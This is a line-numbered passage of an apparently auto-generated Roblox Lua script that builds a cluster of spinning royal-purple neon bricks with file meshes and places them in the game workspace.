  5805. o25.Position = Vector3.new(2.965698, 2.42810798, -1.73171997)
  5806. o25.Orientation = Vector3.new(74.2900009, -32.6100006, 52.3400002)
  5807. o25.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5808. o26.Parent = o25
  5809. o26.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5810. o26.Offset = Vector3.new(2, 2, 2)
  5811. o26.Scale = Vector3.new(1000, 1000, 1000)
  5812. o26.VertexColor = Vector3.new(0.300000012, 4, 9)
  5813. o26.MeshType = Enum.MeshType.FileMesh
  5814. o26.Scale = Vector3.new(1000, 1000, 1000)
  5815. o27.Name = "Brick"
  5816. o27.Parent = o2
  5817. o27.Material = Enum.Material.Neon
  5818. o27.BrickColor = BrickColor.new("Royal purple")
  5819. o27.Position = Vector3.new(3.04232788, 2.21434498, -1.63577294)
  5820. o27.Rotation = Vector3.new(80.3700027, 1.61000001, 80.4100037)
  5821. o27.Anchored = true
  5822. o27.CanCollide = false
  5823. o27.Size = Vector3.new(1, 2.4000001, 1)
  5824. o27.CFrame = CFrame.new(3.04232788, 2.21434498, -1.63577294, 0.166501582, -0.985645115, 0.0280937776, 0.169498622, 0.000545704737, -0.985533655, 0.971367121, 0.168852925, 0.167152837)
  5825. o27.BottomSurface = Enum.SurfaceType.Smooth
  5826. o27.TopSurface = Enum.SurfaceType.Smooth
  5827. o27.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5828. o27.Position = Vector3.new(3.04232788, 2.21434498, -1.63577294)
  5829. o27.Orientation = Vector3.new(80.2399979, 9.53999996, 89.8199997)
  5830. o27.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5831. o28.Parent = o27
  5832. o28.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5833. o28.Offset = Vector3.new(2, 2, 2)
  5834. o28.Scale = Vector3.new(1000, 1000, 1000)
  5835. o28.VertexColor = Vector3.new(0.300000012, 4, 9)
  5836. o28.MeshType = Enum.MeshType.FileMesh
  5837. o28.Scale = Vector3.new(1000, 1000, 1000)
  5838. o29.Name = "Brick"
  5839. o29.Parent = o2
  5840. o29.Material = Enum.Material.Neon
  5841. o29.BrickColor = BrickColor.new("Royal purple")
  5842. o29.Position = Vector3.new(5.06256104, 2.90255404, -2.91796899)
  5843. o29.Rotation = Vector3.new(-133.990005, -24.3700008, -63.5200005)
  5844. o29.Anchored = true
  5845. o29.CanCollide = false
  5846. o29.Size = Vector3.new(1, 2.4000001, 1)
  5847. o29.CFrame = CFrame.new(5.06256104, 2.90255404, -2.91796899, 0.406100124, 0.815340042, -0.412699133, 0.754046142, -0.0438508503, 0.655360699, 0.516244054, -0.577332199, -0.632607102)
  5848. o29.BottomSurface = Enum.SurfaceType.Smooth
  5849. o29.TopSurface = Enum.SurfaceType.Smooth
  5850. o29.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5851. o29.Position = Vector3.new(5.06256104, 2.90255404, -2.91796899)
  5852. o29.Orientation = Vector3.new(-40.9500008, -146.880005, 93.3300018)
  5853. o29.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5854. o30.Parent = o29
  5855. o30.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5856. o30.Offset = Vector3.new(2, 2, 2)
  5857. o30.Scale = Vector3.new(1000, 1000, 1000)
  5858. o30.VertexColor = Vector3.new(0.300000012, 4, 9)
  5859. o30.MeshType = Enum.MeshType.FileMesh
  5860. o30.Scale = Vector3.new(1000, 1000, 1000)
  5861. o31.Name = "Brick"
  5862. o31.Parent = o2
  5863. o31.Material = Enum.Material.Neon
  5864. o31.BrickColor = BrickColor.new("Royal purple")
  5865. o31.Position = Vector3.new(4.91119385, 3.09106302, -2.96588111)
  5866. o31.Rotation = Vector3.new(-131.279999, -34.7700005, -65.9599991)
  5867. o31.Anchored = true
  5868. o31.CanCollide = false
  5869. o31.Size = Vector3.new(1, 2.4000001, 1)
  5870. o31.CFrame = CFrame.new(4.91119385, 3.09106302, -2.96588111, 0.334565103, 0.75018847, -0.570341349, 0.777153254, 0.122676805, 0.61724031, 0.533016145, -0.649748385, -0.541965544)
  5871. o31.BottomSurface = Enum.SurfaceType.Smooth
  5872. o31.TopSurface = Enum.SurfaceType.Smooth
  5873. o31.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5874. o31.Position = Vector3.new(4.91119385, 3.09106302, -2.96588111)
  5875. o31.Orientation = Vector3.new(-38.1100006, -133.539993, 81.0299988)
  5876. o31.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5877. o32.Parent = o31
  5878. o32.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5879. o32.Offset = Vector3.new(2, 2, 2)
  5880. o32.Scale = Vector3.new(1000, 1000, 1000)
  5881. o32.VertexColor = Vector3.new(0.300000012, 4, 9)
  5882. o32.MeshType = Enum.MeshType.FileMesh
  5883. o32.Scale = Vector3.new(1000, 1000, 1000)
  5884. o33.Name = "Brick"
  5885. o33.Parent = o2
  5886. o33.Material = Enum.Material.Neon
  5887. o33.BrickColor = BrickColor.new("Royal purple")
  5888. o33.Position = Vector3.new(4.72817993, 3.2543149, -2.98629689)
  5889. o33.Rotation = Vector3.new(-128.759995, -45.2599983, -68.1200027)
  5890. o33.Anchored = true
  5891. o33.CanCollide = false
  5892. o33.Size = Vector3.new(1, 2.4000001, 1)
  5893. o33.CFrame = CFrame.new(4.72817993, 3.2543149, -2.98629689, 0.262331456, 0.653153419, -0.71034348, 0.78741014, 0.280647159, 0.548841178, 0.557832479, -0.703308582, -0.440674037)
  5894. o33.BottomSurface = Enum.SurfaceType.Smooth
  5895. o33.TopSurface = Enum.SurfaceType.Smooth
  5896. o33.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5897. o33.Position = Vector3.new(4.72817993, 3.2543149, -2.98629689)
  5898. o33.Orientation = Vector3.new(-33.2900009, -121.809998, 70.3799973)
  5899. o33.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5900. o34.Parent = o33
  5901. o34.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5902. o34.Offset = Vector3.new(2, 2, 2)
  5903. o34.Scale = Vector3.new(1000, 1000, 1000)
  5904. o34.VertexColor = Vector3.new(0.300000012, 4, 9)
  5905. o34.MeshType = Enum.MeshType.FileMesh
  5906. o34.Scale = Vector3.new(1000, 1000, 1000)
  5907. o35.Name = "Brick"
  5908. o35.Parent = o2
  5909. o35.Material = Enum.Material.Neon
  5910. o35.BrickColor = BrickColor.new("Royal purple")
  5911. o35.Position = Vector3.new(4.52124023, 3.38793397, -2.97735596)
  5912. o35.Rotation = Vector3.new(-126.300003, -55.8100014, -69.9899979)
  5913. o35.Anchored = true
  5914. o35.CanCollide = false
  5915. o35.Size = Vector3.new(1, 2.4000001, 1)
  5916. o35.CFrame = CFrame.new(4.52124023, 3.38793397, -2.97735596, 0.192273602, 0.528050721, -0.8271662, 0.784404039, 0.42380619, 0.452882349, 0.589703321, -0.735906541, -0.332716405)
  5917. o35.BottomSurface = Enum.SurfaceType.Smooth
  5918. o35.TopSurface = Enum.SurfaceType.Smooth
  5919. o35.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5920. o35.Position = Vector3.new(4.52124023, 3.38793397, -2.97735596)
  5921. o35.Orientation = Vector3.new(-26.9300003, -111.910004, 61.6199989)
  5922. o35.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5923. o36.Parent = o35
  5924. o36.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5925. o36.Offset = Vector3.new(2, 2, 2)
  5926. o36.Scale = Vector3.new(1000, 1000, 1000)
  5927. o36.VertexColor = Vector3.new(0.300000012, 4, 9)
  5928. o36.MeshType = Enum.MeshType.FileMesh
  5929. o36.Scale = Vector3.new(1000, 1000, 1000)
  5930. o37.Name = "Brick"
  5931. o37.Parent = o2
  5932. o37.Material = Enum.Material.Neon
  5933. o37.BrickColor = BrickColor.new("Royal purple")
  5934. o37.Position = Vector3.new(4.29772902, 3.48497605, -2.94018507)
  5935. o37.Rotation = Vector3.new(-123.709999, -66.4000015, -71.4899979)
  5936. o37.Anchored = true
  5937. o37.CanCollide = false
  5938. o37.Size = Vector3.new(1, 2.4000001, 1)
  5939. o37.CFrame = CFrame.new(4.29772902, 3.48497605, -2.94018507, 0.12711224, 0.379692227, -0.916344583, 0.768234134, 0.546692252, 0.333088756, 0.627428651, -0.746304989, -0.222200081)
  5940. o37.BottomSurface = Enum.SurfaceType.Smooth
  5941. o37.TopSurface = Enum.SurfaceType.Smooth
  5942. o37.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5943. o37.Position = Vector3.new(4.29772902, 3.48497605, -2.94018507)
  5944. o37.Orientation = Vector3.new(-19.4599991, -103.629997, 54.5600014)
  5945. o37.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5946. o38.Parent = o37
  5947. o38.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5948. o38.Offset = Vector3.new(2, 2, 2)
  5949. o38.Scale = Vector3.new(1000, 1000, 1000)
  5950. o38.VertexColor = Vector3.new(0.300000012, 4, 9)
  5951. o38.MeshType = Enum.MeshType.FileMesh
  5952. o38.Scale = Vector3.new(1000, 1000, 1000)
  5953. o39.Name = "Brick"
  5954. o39.Parent = o2
  5955. o39.Material = Enum.Material.Neon
  5956. o39.BrickColor = BrickColor.new("Royal purple")
  5957. o39.Position = Vector3.new(4.06726122, 3.54251599, -2.87588501)
  5958. o39.Rotation = Vector3.new(-120.32, -77.0100021, -72.0400009)
  5959. o39.Anchored = true
  5960. o39.CanCollide = false
  5961. o39.Size = Vector3.new(1, 2.4000001, 1)
  5962. o39.CFrame = CFrame.new(4.06726122, 3.54251599, -2.87588501, 0.0693322793, 0.213873416, -0.974402368, 0.739563346, 0.644502819, 0.194081604, 0.669512689, -0.734086096, -0.113487378)
  5963. o39.BottomSurface = Enum.SurfaceType.Smooth
  5964. o39.TopSurface = Enum.SurfaceType.Smooth
  5965. o39.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5966. o39.Position = Vector3.new(4.06726122, 3.54251599, -2.87588501)
  5967. o39.Orientation = Vector3.new(-11.1899996, -96.6399994, 48.9300003)
  5968. o39.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5969. o40.Parent = o39
  5970. o40.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5971. o40.Offset = Vector3.new(2, 2, 2)
  5972. o40.Scale = Vector3.new(1000, 1000, 1000)
  5973. o40.VertexColor = Vector3.new(0.300000012, 4, 9)
  5974. o40.MeshType = Enum.MeshType.FileMesh
  5975. o40.Scale = Vector3.new(1000, 1000, 1000)
  5976. o41.Name = "Brick"
  5977. o41.Parent = o2
  5978. o41.Material = Enum.Material.Neon
  5979. o41.BrickColor = BrickColor.new("Royal purple")
  5980. o41.Position = Vector3.new(3.83755493, 3.5582931, -2.78716993)
  5981. o41.Rotation = Vector3.new(-104.620003, -87.5599976, -60.2000008)
  5982. o41.Anchored = true
  5983. o41.CanCollide = false
  5984. o41.Size = Vector3.new(1, 2.4000001, 1)
  5985. o41.CFrame = CFrame.new(3.83755493, 3.5582931, -2.78716993, 0.0211498551, 0.0369331241, -0.999094546, 0.6994735, 0.713474691, 0.0411797762, 0.714347363, -0.699709892, -0.0107443864)
  5986. o41.BottomSurface = Enum.SurfaceType.Smooth
  5987. o41.TopSurface = Enum.SurfaceType.Smooth
  5988. o41.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5989. o41.Position = Vector3.new(3.83755493, 3.5582931, -2.78716993)
  5990. o41.Orientation = Vector3.new(-2.3599999, -90.6200027, 44.4300003)
  5991. o41.Color = Color3.new(0.384314, 0.145098, 0.819608)
  5992. o42.Parent = o41
  5993. o42.MeshId = "http://www.roblox.com/asset/?id=1125478"
  5994. o42.Offset = Vector3.new(2, 2, 2)
  5995. o42.Scale = Vector3.new(1000, 1000, 1000)
  5996. o42.VertexColor = Vector3.new(0.300000012, 4, 9)
  5997. o42.MeshType = Enum.MeshType.FileMesh
  5998. o42.Scale = Vector3.new(1000, 1000, 1000)
  5999. o43.Name = "Brick"
  6000. o43.Parent = o2
  6001. o43.Material = Enum.Material.Neon
  6002. o43.BrickColor = BrickColor.new("Royal purple")
  6003. o43.Position = Vector3.new(3.70880103, 1.53280604, -1.51110804)
  6004. o43.Rotation = Vector3.new(105.5, 37.2799988, 55.6800003)
  6005. o43.Anchored = true
  6006. o43.CanCollide = false
  6007. o43.Size = Vector3.new(1, 2.4000001, 1)
  6008. o43.CFrame = CFrame.new(3.70880103, 1.53280604, -1.51110804, 0.448593676, -0.657117724, 0.605777919, 0.108368672, -0.632810354, -0.766686857, 0.887145698, 0.409578443, -0.21266529)
  6009. o43.BottomSurface = Enum.SurfaceType.Smooth
  6010. o43.TopSurface = Enum.SurfaceType.Smooth
  6011. o43.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6012. o43.Position = Vector3.new(3.70880103, 1.53280604, -1.51110804)
  6013. o43.Orientation = Vector3.new(50.0600014, 109.339996, 170.279999)
  6014. o43.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6015. o44.Parent = o43
  6016. o44.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6017. o44.Offset = Vector3.new(2, 2, 2)
  6018. o44.Scale = Vector3.new(1000, 1000, 1000)
  6019. o44.VertexColor = Vector3.new(0.300000012, 4, 9)
  6020. o44.MeshType = Enum.MeshType.FileMesh
  6021. o44.Scale = Vector3.new(1000, 1000, 1000)
  6022. o45.Name = "Brick"
  6023. o45.Parent = o2
  6024. o45.Material = Enum.Material.Neon
  6025. o45.BrickColor = BrickColor.new("Royal purple")
  6026. o45.Position = Vector3.new(3.9332881, 1.43899, -1.55038404)
  6027. o45.Rotation = Vector3.new(116.610001, 43.8199997, 44.6500015)
  6028. o45.Anchored = true
  6029. o45.CanCollide = false
  6030. o45.Size = Vector3.new(1, 2.4000001, 1)
  6031. o45.CFrame = CFrame.new(3.9332881, 1.43899, -1.55038404, 0.513256431, -0.507025182, 0.692457318, 0.125652671, -0.753752112, -0.645036459, 0.848991394, 0.418078154, -0.323159516)
  6032. o45.BottomSurface = Enum.SurfaceType.Smooth
  6033. o45.TopSurface = Enum.SurfaceType.Smooth
  6034. o45.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6035. o45.Position = Vector3.new(3.9332881, 1.43899, -1.55038404)
  6036. o45.Orientation = Vector3.new(40.1699982, 115.019997, 170.539993)
  6037. o45.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6038. o46.Parent = o45
  6039. o46.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6040. o46.Offset = Vector3.new(2, 2, 2)
  6041. o46.Scale = Vector3.new(1000, 1000, 1000)
  6042. o46.VertexColor = Vector3.new(0.300000012, 4, 9)
  6043. o46.MeshType = Enum.MeshType.FileMesh
  6044. o46.Scale = Vector3.new(1000, 1000, 1000)
  6045. o47.Name = "Brick"
  6046. o47.Parent = o2
  6047. o47.Material = Enum.Material.Neon
  6048. o47.BrickColor = BrickColor.new("Royal purple")
  6049. o47.Position = Vector3.new(4.16439819, 1.38474405, -1.61688197)
  6050. o47.Rotation = Vector3.new(130.539993, 48.4000015, 30.7999992)
  6051. o47.Anchored = true
  6052. o47.CanCollide = false
  6053. o47.Size = Vector3.new(1, 2.4000001, 1)
  6054. o47.CFrame = CFrame.new(4.16439819, 1.38474405, -1.61688197, 0.570331037, -0.339972913, 0.747757614, 0.155332476, -0.849266231, -0.504599333, 0.806594849, 0.403941095, -0.43155393)
  6055. o47.BottomSurface = Enum.SurfaceType.Smooth
  6056. o47.TopSurface = Enum.SurfaceType.Smooth
  6057. o47.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6058. o47.Position = Vector3.new(4.16439819, 1.38474405, -1.61688197)
  6059. o47.Orientation = Vector3.new(30.2999992, 119.989998, 169.639999)
  6060. o47.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6061. o48.Parent = o47
  6062. o48.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6063. o48.Offset = Vector3.new(2, 2, 2)
  6064. o48.Scale = Vector3.new(1000, 1000, 1000)
  6065. o48.VertexColor = Vector3.new(0.300000012, 4, 9)
  6066. o48.MeshType = Enum.MeshType.FileMesh
  6067. o48.Scale = Vector3.new(1000, 1000, 1000)
  6068. o49.Name = "Brick"
  6069. o49.Parent = o2
  6070. o49.Material = Enum.Material.Neon
  6071. o49.BrickColor = BrickColor.new("Royal purple")
  6072. o49.Position = Vector3.new(4.39288282, 1.37233901, -1.70782495)
  6073. o49.Rotation = Vector3.new(146.669998, 50.3100014, 14.7399998)
  6074. o49.Anchored = true
  6075. o49.CanCollide = false
  6076. o49.Size = Vector3.new(1, 2.4000001, 1)
  6077. o49.CFrame = CFrame.new(4.39288282, 1.37233901, -1.70782495, 0.617577851, -0.162517488, 0.769542575, 0.196282297, -0.915626526, -0.35088259, 0.76163286, 0.367743611, -0.533573449)
  6078. o49.BottomSurface = Enum.SurfaceType.Smooth
  6079. o49.TopSurface = Enum.SurfaceType.Smooth
  6080. o49.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6081. o49.Position = Vector3.new(4.39288282, 1.37233901, -1.70782495)
  6082. o49.Orientation = Vector3.new(20.5400009, 124.739998, 167.899994)
  6083. o49.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6084. o50.Parent = o49
  6085. o50.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6086. o50.Offset = Vector3.new(2, 2, 2)
  6087. o50.Scale = Vector3.new(1000, 1000, 1000)
  6088. o50.VertexColor = Vector3.new(0.300000012, 4, 9)
  6089. o50.MeshType = Enum.MeshType.FileMesh
  6090. o50.Scale = Vector3.new(1000, 1000, 1000)
  6091. o51.Name = "Brick"
  6092. o51.Parent = o2
  6093. o51.Material = Enum.Material.Neon
  6094. o51.BrickColor = BrickColor.new("Royal purple")
  6095. o51.Position = Vector3.new(4.77636719, 1.45922303, -1.92498803)
  6096. o51.Rotation = Vector3.new(175.460007, 46.1100006, -13.9099998)
  6097. o51.Anchored = true
  6098. o51.CanCollide = false
  6099. o51.Size = Vector3.new(1, 2.4000001, 1)
  6100. o51.CFrame = CFrame.new(4.77636719, 1.45922303, -1.92498803, 0.672873378, 0.16669859, 0.720732152, 0.295064241, -0.953904152, -0.0548422486, 0.678368092, 0.249565676, -0.691042304)
  6101. o51.BottomSurface = Enum.SurfaceType.Smooth
  6102. o51.TopSurface = Enum.SurfaceType.Smooth
  6103. o51.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6104. o51.Position = Vector3.new(4.77636719, 1.45922303, -1.92498803)
  6105. o51.Orientation = Vector3.new(3.1400001, 133.800003, 162.809998)
  6106. o51.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6107. o52.Parent = o51
  6108. o52.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6109. o52.Offset = Vector3.new(2, 2, 2)
  6110. o52.Scale = Vector3.new(1000, 1000, 1000)
  6111. o52.VertexColor = Vector3.new(0.300000012, 4, 9)
  6112. o52.MeshType = Enum.MeshType.FileMesh
  6113. o52.Scale = Vector3.new(1000, 1000, 1000)
  6114. o53.Name = "Brick"
  6115. o53.Parent = o2
  6116. o53.Material = Enum.Material.Neon
  6117. o53.BrickColor = BrickColor.new("Royal purple")
  6118. o53.Position = Vector3.new(4.95245314, 1.56303596, -2.06259108)
  6119. o53.Rotation = Vector3.new(-172.199997, 40.3600006, -26.1700001)
  6120. o53.Anchored = true
  6121. o53.CanCollide = false
  6122. o53.Size = Vector3.new(1, 2.4000001, 1)
  6123. o53.CFrame = CFrame.new(4.95245314, 1.56303596, -2.06259108, 0.68390286, 0.33614102, 0.64752382, 0.358143985, -0.927920341, 0.103433087, 0.635619402, 0.161170885, -0.754993856)
  6124. o53.BottomSurface = Enum.SurfaceType.Smooth
  6125. o53.TopSurface = Enum.SurfaceType.Smooth
  6126. o53.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6127. o53.Position = Vector3.new(4.95245314, 1.56303596, -2.06259108)
  6128. o53.Orientation = Vector3.new(-5.94000006, 139.380005, 158.899994)
  6129. o53.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6130. o54.Parent = o53
  6131. o54.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6132. o54.Offset = Vector3.new(2, 2, 2)
  6133. o54.Scale = Vector3.new(1000, 1000, 1000)
  6134. o54.VertexColor = Vector3.new(0.300000012, 4, 9)
  6135. o54.MeshType = Enum.MeshType.FileMesh
  6136. o54.Scale = Vector3.new(1000, 1000, 1000)
  6137. o55.Name = "Brick"
  6138. o55.Parent = o2
  6139. o55.Material = Enum.Material.Neon
  6140. o55.BrickColor = BrickColor.new("Royal purple")
  6141. o55.Position = Vector3.new(5.09490919, 1.70155895, -2.20797706)
  6142. o55.Rotation = Vector3.new(-162.550003, 33, -35.7400017)
  6143. o55.Anchored = true
  6144. o55.CanCollide = false
  6145. o55.Size = Vector3.new(1, 2.4000001, 1)
  6146. o55.CFrame = CFrame.new(5.09490919, 1.70155895, -2.20797706, 0.680727184, 0.489860028, 0.544654846, 0.424662501, -0.869728863, 0.251472116, 0.596890628, 0.0601115078, -0.80007118)
  6147. o55.BottomSurface = Enum.SurfaceType.Smooth
  6148. o55.TopSurface = Enum.SurfaceType.Smooth
  6149. o55.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6150. o55.Position = Vector3.new(5.09490919, 1.70155895, -2.20797706)
  6151. o55.Orientation = Vector3.new(-14.5600004, 145.75, 153.979996)
  6152. o55.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6153. o56.Parent = o55
  6154. o56.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6155. o56.Offset = Vector3.new(2, 2, 2)
  6156. o56.Scale = Vector3.new(1000, 1000, 1000)
  6157. o56.VertexColor = Vector3.new(0.300000012, 4, 9)
  6158. o56.MeshType = Enum.MeshType.FileMesh
  6159. o56.Scale = Vector3.new(1000, 1000, 1000)
  6160. o57.Name = "Brick"
  6161. o57.Parent = o2
  6162. o57.Material = Enum.Material.Neon
  6163. o57.BrickColor = BrickColor.new("Royal purple")
  6164. o57.Position = Vector3.new(5.19952393, 1.86994803, -2.35424805)
  6165. o57.Rotation = Vector3.new(-155.059998, 24.5900002, -43.1399994)
  6166. o57.Anchored = true
  6167. o57.CanCollide = false
  6168. o57.Size = Vector3.new(1, 2.4000001, 1)
  6169. o57.CFrame = CFrame.new(5.19952393, 1.86994803, -2.35424805, 0.663467348, 0.621792495, 0.416159749, 0.492012411, -0.781613827, 0.383423984, 0.563687682, -0.0496326238, -0.824503481)
  6170. o57.BottomSurface = Enum.SurfaceType.Smooth
  6171. o57.TopSurface = Enum.SurfaceType.Smooth
  6172. o57.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6173. o57.Position = Vector3.new(5.19952393, 1.86994803, -2.35424805)
  6174. o57.Orientation = Vector3.new(-22.5499992, 153.220001, 147.809998)
  6175. o57.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6176. o58.Parent = o57
  6177. o58.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6178. o58.Offset = Vector3.new(2, 2, 2)
  6179. o58.Scale = Vector3.new(1000, 1000, 1000)
  6180. o58.VertexColor = Vector3.new(0.300000012, 4, 9)
  6181. o58.MeshType = Enum.MeshType.FileMesh
  6182. o58.Scale = Vector3.new(1000, 1000, 1000)
  6183. o59.Name = "Brick"
  6184. o59.Parent = o2
  6185. o59.Material = Enum.Material.Neon
  6186. o59.BrickColor = BrickColor.new("Royal purple")
  6187. o59.Position = Vector3.new(5.2615962, 2.06174994, -2.49609399)
  6188. o59.Rotation = Vector3.new(-149.139999, 15.4899998, -48.9599991)
  6189. o59.Anchored = true
  6190. o59.CanCollide = false
  6191. o59.Size = Vector3.new(1, 2.4000001, 1)
  6192. o59.CFrame = CFrame.new(5.2615962, 2.06174994, -2.49609399, 0.632684767, 0.726892948, 0.267095983, 0.557561934, -0.666930854, 0.49429667, 0.53743577, -0.163808867, -0.827243149)
  6193. o59.BottomSurface = Enum.SurfaceType.Smooth
  6194. o59.TopSurface = Enum.SurfaceType.Smooth
  6195. o59.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6196. o59.Position = Vector3.new(5.2615962, 2.06174994, -2.49609399)
  6197. o59.Orientation = Vector3.new(-29.6200008, 162.110001, 140.100006)
  6198. o59.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6199. o60.Parent = o59
  6200. o60.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6201. o60.Offset = Vector3.new(2, 2, 2)
  6202. o60.Scale = Vector3.new(1000, 1000, 1000)
  6203. o60.VertexColor = Vector3.new(0.300000012, 4, 9)
  6204. o60.MeshType = Enum.MeshType.FileMesh
  6205. o60.Scale = Vector3.new(1000, 1000, 1000)
  6206. o61.Name = "Brick"
  6207. o61.Parent = o2
  6208. o61.Material = Enum.Material.Neon
  6209. o61.BrickColor = BrickColor.new("Royal purple")
  6210. o61.Position = Vector3.new(5.27862501, 2.26872897, -2.62854004)
  6211. o61.Rotation = Vector3.new(-144.360001, 5.92000008, -53.6399994)
  6212. o61.Anchored = true
  6213. o61.CanCollide = false
  6214. o61.Size = Vector3.new(1, 2.4000001, 1)
  6215. o61.CFrame = CFrame.new(5.27862501, 2.26872897, -2.62854004, 0.589739919, 0.800988555, 0.103097625, 0.618806839, -0.530213952, 0.579620779, 0.518933594, -0.278024584, -0.808341324)
  6216. o61.BottomSurface = Enum.SurfaceType.Smooth
  6217. o61.TopSurface = Enum.SurfaceType.Smooth
  6218. o61.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6219. o61.Position = Vector3.new(5.27862501, 2.26872897, -2.62854004)
  6220. o61.Orientation = Vector3.new(-35.4199982, 172.729996, 130.589996)
  6221. o61.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6222. o62.Parent = o61
  6223. o62.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6224. o62.Offset = Vector3.new(2, 2, 2)
  6225. o62.Scale = Vector3.new(1000, 1000, 1000)
  6226. o62.VertexColor = Vector3.new(0.300000012, 4, 9)
  6227. o62.MeshType = Enum.MeshType.FileMesh
  6228. o62.Scale = Vector3.new(1000, 1000, 1000)
  6229. o63.Name = "Brick"
  6230. o63.Parent = o2
  6231. o63.Material = Enum.Material.Neon
  6232. o63.BrickColor = BrickColor.new("Royal purple")
  6233. o63.Position = Vector3.new(5.25003004, 2.4836719, -2.74575806)
  6234. o63.Rotation = Vector3.new(-140.380005, -3.97000003, -57.4799995)
  6235. o63.Anchored = true
  6236. o63.CanCollide = false
  6237. o63.Size = Vector3.new(1, 2.4000001, 1)
  6238. o63.CFrame = CFrame.new(5.25003004, 2.4836719, -2.74575806, 0.536248684, 0.841212153, -0.0692981035, 0.673294485, -0.376801223, 0.636157036, 0.5090307, -0.387795955, -0.768441141)
  6239. o63.BottomSurface = Enum.SurfaceType.Smooth
  6240. o63.TopSurface = Enum.SurfaceType.Smooth
  6241. o63.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6242. o63.Position = Vector3.new(5.25003004, 2.4836719, -2.74575806)
  6243. o63.Orientation = Vector3.new(-39.5099983, -174.850006, 119.230003)
  6244. o63.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6245. o64.Parent = o63
  6246. o64.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6247. o64.Offset = Vector3.new(2, 2, 2)
  6248. o64.Scale = Vector3.new(1000, 1000, 1000)
  6249. o64.VertexColor = Vector3.new(0.300000012, 4, 9)
  6250. o64.MeshType = Enum.MeshType.FileMesh
  6251. o64.Scale = Vector3.new(1000, 1000, 1000)
  6252. o65.Name = "Brick"
  6253. o65.Parent = o2
  6254. o65.Material = Enum.Material.Neon
  6255. o65.BrickColor = BrickColor.new("Royal purple")
  6256. o65.Position = Vector3.new(5.17730713, 2.697891, -2.84332299)
  6257. o65.Rotation = Vector3.new(-136.979996, -14.0900002, -60.7299995)
  6258. o65.Anchored = true
  6259. o65.CanCollide = false
  6260. o65.Size = Vector3.new(1, 2.4000001, 1)
  6261. o65.CFrame = CFrame.new(5.17730713, 2.697891, -2.84332299, 0.474191397, 0.846081197, -0.243520409, 0.718994558, -0.212507248, 0.661735475, 0.508131981, -0.488876581, -0.709092855)
  6262. o65.BottomSurface = Enum.SurfaceType.Smooth
  6263. o65.TopSurface = Enum.SurfaceType.Smooth
  6264. o65.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6265. o65.Position = Vector3.new(5.17730713, 2.697891, -2.84332299)
  6266. o65.Orientation = Vector3.new(-41.4300003, -161.050003, 106.470001)
  6267. o65.Color = Color3.new(0.384314, 0.145098, 0.819608)
  6268. o66.Parent = o65
  6269. o66.MeshId = "http://www.roblox.com/asset/?id=1125478"
  6270. o66.Offset = Vector3.new(2, 2, 2)
  6271. o66.Scale = Vector3.new(1000, 1000, 1000)
  6272. o66.VertexColor = Vector3.new(0.300000012, 4, 9)
  6273. o66.MeshType = Enum.MeshType.FileMesh
  6274. o66.Scale = Vector3.new(1000, 1000, 1000)
  6275. o67.Parent = o2
  6276. table.insert(cors,coroutine.create(function()
  6277. wait()
  6278. runDummyScript(function()
  6279. --Time
  6280. l = script.Parent
  6281. while true do
  6282. wait()
  6283. local h = l:GetChildren()
  6284. for i = 1, #h do
  6285. if h[i].Name == "Brick" then
  6286. h[i].CFrame = h[i].CFrame * CFrame.fromEulerAnglesXYZ(0.02,0.01,0.02)
  6287. end
  6288. end
  6289. end
  6290. end,o67)
  6291. end))
  6292. mas.Parent = workspace
  6293. mas:MakeJoints()
  6294. local mas1 = mas:GetChildren()
  6295. for i=1,#mas1 do
  6296. mas1[i].Parent = workspace
